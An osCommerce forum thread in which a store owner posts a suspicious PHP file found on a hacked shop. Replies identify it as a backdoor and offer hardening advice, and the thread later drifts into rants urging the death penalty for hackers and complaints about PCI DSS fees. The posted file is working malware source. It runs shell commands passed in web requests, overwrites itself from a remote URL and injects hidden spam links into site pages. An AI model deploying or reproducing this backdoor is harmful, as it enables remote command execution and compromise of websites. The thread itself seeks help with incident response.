Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

I think my store was hacked?


Magma-tech

Recommended Posts

Can anyone help me, I think my store was hacked, I cannot get into my admin control panel. When I went into my webshell

there was a new php file that I don't remember being there. I will post it below, and if anyone has any idea on what it does I would like to know.... Thanks

 

File Folder Name : Neski

 

Inside was file : hmx.php

 

<?php

ignore_user_abort(1);

set_time_limit(0);

 

function Clear()

{

unlink("c");

unlink("1r");

unlink("log");

}

 

function Clear2()

{

$mrd = trim(file_get_contents("m"));

$pt = "../$mrd";

$fin = file_get_contents($pt);

$fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);

$fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);

$fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin);

$fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);

$fin = ereg_replace("<!--dd4-->", "", $fin);

$fin = ereg_replace("<!--dd5-->", "", $fin);

$fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);

$fmrd = fopen($pt, "w+");

fwrite($fmrd, $fin);

fclose($fmrd);

echo " upt-ok";

}

 

function GetVar($name, &$var)

{

$var = "";

if (isset($_POST[$name]))

$var = $_POST[$name];

 

if (isset($_GET[$name]))

$var = $_GET[$name];

 

if (($var) =="")

return false;

else return true;

}

 

function Gen()

{

$alp = "abcdefghiklmnjsweqrtyuiopzx";

$maps = array();

if (isset($_POST["sg"]))

$sg = $_POST["sg"];

 

if (isset($_GET["sg"]))

$sg = $_GET["sg"];

 

if (isset($_POST["gm"]))

$g = $_POST["gm"];

 

if (isset($_GET["gm"]))

$g = $_GET["gm"];

 

 

$path = "";

$fr = fopen("1r", "a+");

if (file_exists("c"))

{

$fconf = file("c");

$tname = trim($fconf[0]);

$cname = trim($fconf[1]);

$curs = trim($fconf[2]);

$pid = trim($fconf[3]);

if ($pid == 100)

{

$pid = 0;

$rnd = mt_rand(0, 999);

$nm = "";

for ($i=0; $i<3; $i++)

{

$ran = mt_rand(0,26);

$sym = $alp[$ran];

$nm = $nm.$sym;

}

$cname = $nm;

mkdir("$tname/$cname");

$curs = $g;

}

}

else

{

$rnd = mt_rand(0, 999);

$nm = "";

for ($i=0; $i<5; $i++)

{

$ran = mt_rand(0,26);

$sym = $alp[$ran];

$nm = $nm.$sym;

}

$tname = $nm;

$pid = 0;

$curs = $g;

mkdir($tname);

$fht = fopen("$tname/.htaccess", "w+");

$htname = $sg."2.txt";

$fp = fopen($htname, "r");

$fin = '';

while (!feof($fp))

{

$fc = fgets($fp, 1024);

if (!$fc) break;

$fin .= $fc;

}

fclose($fp);

fwrite($fht, $fin);

fclose($fht);

$rnd = mt_rand(0, 999);

$nm = "";

for ($i=0; $i<3; $i++)

{

$ran = mt_rand(0,26);

$sym = $alp[$ran];

$nm = $nm.$sym;

}

$cname = $nm;

mkdir("$tname/$cname");

}

$gname = $sg."sgen.php";

for ($j=$pid; $j<$pid+10; $j++)

{

$fp = fopen($gname."?g=$curs", "r");

$fin = '';

while (!feof($fp))

{

$fc = fgets($fp, 1024);

if (!$fc) break;

$fin .= $fc;

}

fclose($fp);

 

$fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+");

fwrite($fnd, $fin);

fclose($fnd);

}

 

if ($j==100)

{

$fp = fopen($gname."?g=$curs&m=1", "r");

$fin = '';

while (!feof($fp))

{

$fc = fgets($fp, 1024);

if (!$fc) break;

$fin .= $fc;

}

fclose($fp);

$fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+");

fwrite($fnd, $fin);

fclose($fnd);

$map = "$path/$tname/$cname/$curs"."_lm.htm";

fwrite($fr,"$map\n");

}

 

$fconf = fopen("c", "w+");

fwrite($fconf, $tname."\n");

fwrite($fconf, $cname."\n");

fwrite($fconf, $curs."\n");

$nj = $j;

fwrite($fconf, $nj."\n");

fclose($fconf);

}

 

function Update()

{

$thisname = "1.php";

if (isset($_POST['u']))

$u = $_POST['u'];

 

if (isset($_GET['u']))

$u = $_GET['u'];

 

$fp = fopen($u, "r");

$fin = '';

while (!feof($fp))

{

$fc = fgets($fp, 1024);

if (!$fc) break;

$fin .= $fc;

}

fclose($fp);

 

$fthis = fopen($thisname, "w+");

fwrite($fthis, $fin);

fclose($fthis);

}

 

function Com()

{

if (isset($_POST['c']))

@system($_POST['c']);

if (isset($_GET['c']))

@system($_GET['c']);

}

 

function MRepl()

{

$mpt = "";

$drs = "";

$begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">";

$endtag = "</font></body></html><dd5> ";

$mrd = trim(file_get_contents("m"));

$pt = "../$mrd";

$fin = file_get_contents($pt);

GetVar("mpt", $mpt);

// óäàëÿåì çàâåðøàþùèå õòìë òåãè

$fin = preg_replace ("/<\/body>/i", "", $fin);

$fin = preg_replace ("/<\/html>/i", "", $fin);

$fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);

$fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);

$fp = fopen($mpt, "r");

$drs = '';

while (!feof($fp))

{

$fc = fgets($fp, 1024);

if (!$fc)

{

exit();

}

$drs .= $fc;

}

fclose($fp);

$fin = $fin.$begtag;

$fin = $fin.$drs;

$fin = $fin.$endtag;

$fmrd = fopen($pt, "w+");

fwrite($fmrd, $fin);

fclose($fmrd);

}

 

function Main()

{

if (isset($_POST['u']) || isset($_GET['u']))

{

Update();

exit();

}

 

if (isset($_POST['c']) || isset($_GET['c']))

{

Com();

exit();

}

 

if (isset($_POST['g']) || isset($_GET['g']))

{

Gen();

exit();

}

 

if (isset($_POST['s']) || isset($_GET['s']))

{

MRepl();

exit();

}

 

if (isset($_POST['cl']) || isset($_GET['cl']))

{

Clear();

exit();

}

 

if (isset($_POST['cl2']) || isset($_GET['cl2']))

{

Clear2();

exit();

}

 

echo "<ok>";

 

}

 

Main();

 

?>

Link to comment
Share on other sites

seems like it might be because when i googled it the word neski file came up with some files from a Movie... Which means there might be hack. You can call your host and see if they can give you any info... my host is really good at identifying strange things to me.

A great place for newbies to start

Road Map to oscommerce File Structure

DO NOT PM ME FOR HELP. My time is valuable, unless i ask you to PM me, please dont. You will get better help if you post publicly. I am not as good at this as you think anyways!

 

HOWEVER, you can visit my blog (go to my profile to see it) and post a question there, i will find time to get back and answer you

 

Proud Memeber of the CODE BREAKERS CLUB!!

Link to comment
Share on other sites

delete that file as soon as you can.

 

it's a back door - it allows the user to run programs and manipulate your web site. time to take a look at your logs and find out how this got there and to implement some security measures.

Link to comment
Share on other sites

It is most definately a hack. You most likely have other files and/or edited files throughout your site.

 

Best thing to do is erase the entire site and re-install a known good backup. Short of that, you need to manually check directories for new files and manually edit files for changes. Personally, I'd go with the first option :)

 

Hopefully, they didn't mess with your database.

 

Install these security mods and make sure that NO directory is set at 777. Putting an .htpasswd file on admin would be a good idea as well. The built in passwording can be defeated.

 

Good luck!

Link to comment
Share on other sites

Is this true? Can you please explain this a little bit more?

 

BJ

 

 

If hackers know where your admin directory is, they can run a password cracker program against it and try many (possibly thousands?) of username/password combinations a second. This attack does not throw up any flags to the server administrators, so the hacker can keep brute forcing your door till they get in.

 

One thing you can do is change the directory name from admin to something else. A long string of random letters and numbers would be best. If they can't find the admin directory, they can't attempt to log in. This, however, is a terrible security method by itself. It gives a false sense of security. Hackers can attempt to brute force a dictionary attack to find your "hidden" admin. The longer the name and more cryptic it is, the harder it will be but a determined hacker 'could' find it no matter what you name it. Clearly, you would not want to enter the 'hidden' admin directory name into your robots.txt file and you would want to make sure you don't store your access logs in a readable area. Either of those would give up the name.

 

If you use a .htpasswd file to password protect your admin directory and a hacker runs a password cracker on it, the system will be alerted after x number of attempts and ban the IP. That's assuming of course the server is setup properly. It would be prudent to check with them to be sure.

 

Another method would be to create an .htaccess file that denies access to everyone except specific IPs. However, if your providor supplies you with a dynamic IP (which is pretty common), this method would be problematic.

 

Hope that helps!

Link to comment
Share on other sites

If hackers know where your admin directory is, they can run a password cracker program against it and try many (possibly thousands?) of username/password combinations a second. This attack does not throw up any flags to the server administrators, so the hacker can keep brute forcing your door till they get in.

 

One thing you can do is change the directory name from admin to something else. A long string of random letters and numbers would be best. If they can't find the admin directory, they can't attempt to log in. This, however, is a terrible security method by itself. It gives a false sense of security. Hackers can attempt to brute force a dictionary attack to find your "hidden" admin. The longer the name and more cryptic it is, the harder it will be but a determined hacker 'could' find it no matter what you name it. Clearly, you would not want to enter the 'hidden' admin directory name into your robots.txt file and you would want to make sure you don't store your access logs in a readable area. Either of those would give up the name.

 

If you use a .htpasswd file to password protect your admin directory and a hacker runs a password cracker on it, the system will be alerted after x number of attempts and ban the IP. That's assuming of course the server is setup properly. It would be prudent to check with them to be sure.

 

Another method would be to create an .htaccess file that denies access to everyone except specific IPs. However, if your providor supplies you with a dynamic IP (which is pretty common), this method would be problematic.

 

Hope that helps!

 

Thank you very much!

Link to comment
Share on other sites

Thank You....

 

It is a hack, and lucky for me I just got my store opened, but did not have any customers yet. I thought I had the admin file password protected with .htaccess, but if that is not enough and I need to change the name also...well that I did not do. I sure would like to see the gov't. make it a death penalty crime to hack into peoples sites. The punishment should fit the crime. IE: If you have done damage, you need to make a 100% restitution to the people that you have damaged. If you can't pay them back because the damage is more than than you can make a restitution for then it is an automatic life in prison or the death penalty. IE: you cost me two months of work...you owe me two months of work. You hack 10,000 computers costing untold man hours in damage you can't make restitution for, then you need to be willing to suffer the consequence of giving up your life in return as payment. And no age limit..... your a snot nosed 16yr. old thinking it's fun to destroy others livelihood, well

then give them life without parole.

 

Anyone want to form a coalition to petition legislators to pass the law? With all the credit card thefts, identity thefts, lost man hours, and cost to us it is about time for such a law. I just got a letter on top of my crash yesterday from my Merchant Account gateway service from First Data of a new mandatory Data Security Requirements. By November 1st. 2008 they are requiring all credit card merchants to be PCI DSS compliant, or they are going to charge my account an extra $20 per month in any month that am not compliant. They give you Security Metrics as an option to get certified, but it cost me an extra $139 per year for their service. I already pay $64 per month for the privilege just to be able to process credit cards. So my yearly total is $767.00 for the merchant account $139 for the certification = $907 per year without even making a sale. The whole idea for having the merchant account was that the credit card was processed by the gateway as a middle man so I don't ever see the credit card, I have no credit card data stored on my end, I pay yearly for SSL .... now this.... guess what..I'm going back to checks through the mail only, and or company P.O.'s

 

Lucky for me I am a wholesale distributor with exclusive rights so I have no competition. But for all you others, this is what the crime of identity theft is costing you. Now the credit card companies want to make you, the merchant pay for it. Also as a little incentive to get me certified, "which the company has a disclaimer for by the way", the letter I got from them had a little threat along with it...quote ..."Merchants can be fined upwards of $1 million if their customers' credit card information is lost or stolen" ...... end quote. So these little hack jobs are now costing you and me our livelihoods, and they get off with a slap on the hand. As for me I can't afford a $1 million dollar threat hanging over my head because of some hack...so I am closing my merchant account, I will save an extra $907 per year I will take check, money order, cashier check, cash, company P.O., ...... I expect the credit card companies to protect me the merchant for all I give them, not the other way around.

Link to comment
Share on other sites

A great place for newbies to start

Road Map to oscommerce File Structure

DO NOT PM ME FOR HELP. My time is valuable, unless i ask you to PM me, please dont. You will get better help if you post publicly. I am not as good at this as you think anyways!

 

HOWEVER, you can visit my blog (go to my profile to see it) and post a question there, i will find time to get back and answer you

 

Proud Memeber of the CODE BREAKERS CLUB!!

Link to comment
Share on other sites

 

Both of those are fine, but they are not the deterrent that the death penalty would have on the crime. Also those two are still not real protection from it happening to you or me..... the threat is still there. While the death penalty would not stop all of it either, .... It would take out those that where for the fun of it...what would be left are the hard core criminals that would deserve the death penalty.

Link to comment
Share on other sites

OMG, the death penalty for hacking? Is that what you're suggesting????? You're joking right?

 

NO I am not joking ! If you cannot pay a restitution for the damage you caused, the penalty should be

the forfeiture of your life. The damage that hackers cost is getting out of control. If there is no accountability

the crime will continue until there is a collapse of society.... And you don't have a clue what a collapse of society

would be like in this day and age. With all the technology it takes to get you your daily food, and necessities of life,

...it is worth the death penalty to stop it.

Link to comment
Share on other sites

I got the same letter as Magma-tech. I must be scanned and fill out the SAQ even though I am a level 4 merchant. My web host cannot change all the settings required to pass the scan on my current shared server, so now I must pay for a dedicated server in order to pass the scanning rule.

 

I can either quit selling online or pay the money. So I agree we need to put a stop to hackers.

 

Prison is for rehabilitation. If your age + your prison sentence = a number over 100, you will not live to be rehabilitated. So why bother? It is my tax money and I do not care to spend it keeping a thief alive.

 

Tim

Link to comment
Share on other sites

i think the biggest problem with cyber crime is that the us government will not investigate or even attempt to prosecute a suspected criminal unless the victim has incurred losses in excess of $5000.

 

that's a pretty steep entry. and most web sites don't do that much in a month, so it would be hard to prove that you have been victimized by computer crime if you can't show that you've been harmed to the tune of $5000. until that changes it's going to be hard to prosecute anyone. that, and the fact that it's hard to get russia (or whatever country your hacker happens to live in) to extradite someone for computer crime when you're out $1000. it's just not enough for the feds to worry about when they have bank robbers and such to go after.

 

we just have to do the best we can to protect our web sites so these guys can't just walk in the back door.

Link to comment
Share on other sites

i think the biggest problem with cyber crime is that the us government will not investigate or even attempt to prosecute a suspected criminal unless the victim has incurred losses in excess of $5000.

 

that's a pretty steep entry. and most web sites don't do that much in a month, so it would be hard to prove that you have been victimized by computer crime if you can't show that you've been harmed to the tune of $5000. until that changes it's going to be hard to prosecute anyone. that, and the fact that it's hard to get russia (or whatever country your hacker happens to live in) to extradite someone for computer crime when you're out $1000. it's just not enough for the feds to worry about when they have bank robbers and such to go after.

 

we just have to do the best we can to protect our web sites so these guys can't just walk in the back door.

 

The problem isn't that they (federal government/state/county/city) won't pursue many "lesser" crimes. The problem is that the people repeatedly ask them not to. Less taxes and smaller government sounds great... then folks wonder why their favorite programs are being cut. Our county jail came very close to being closed a few years ago for lack of funding. A nearby city doesn't even have a police force. The residents wouldn't pay for it!

 

The only way that cyber crime (involving relatively low amounts of money) will receive the enforcability that it deserves is for people to write their appropriate representatives and ask for a tax to pay for it. Clearly that's not going to happen so I doubt we will ever see any change.

Link to comment
Share on other sites

really, you can pay all the taxes that you want, but nothing will be enough to be able to get that Lithuanian Hacker over into our country to prosecute them.. The issue is that hackers are GLOBAL.. they can do damage in one country while actually being in another.. So who prosecutes? BOTH? good luck getting some of those countried to cooperate in apprehending to GET the hacker to the us governement so they can extradite them.. it just isnt going to happen, unfortunately.

 

What i DO think should happen is that these "hacking companies" the BIG GUYS who do this for a living SHOULD be prosecuted. If the government can find out that a company is making money off of targeting innocents, THEN they should go after them.. that is basically what the honeypot is. They collect information to help figure out where the majority of the issues are coming from and they bring a case up with lots of evidence.

A great place for newbies to start

Road Map to oscommerce File Structure

DO NOT PM ME FOR HELP. My time is valuable, unless i ask you to PM me, please dont. You will get better help if you post publicly. I am not as good at this as you think anyways!

 

HOWEVER, you can visit my blog (go to my profile to see it) and post a question there, i will find time to get back and answer you

 

Proud Memeber of the CODE BREAKERS CLUB!!

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...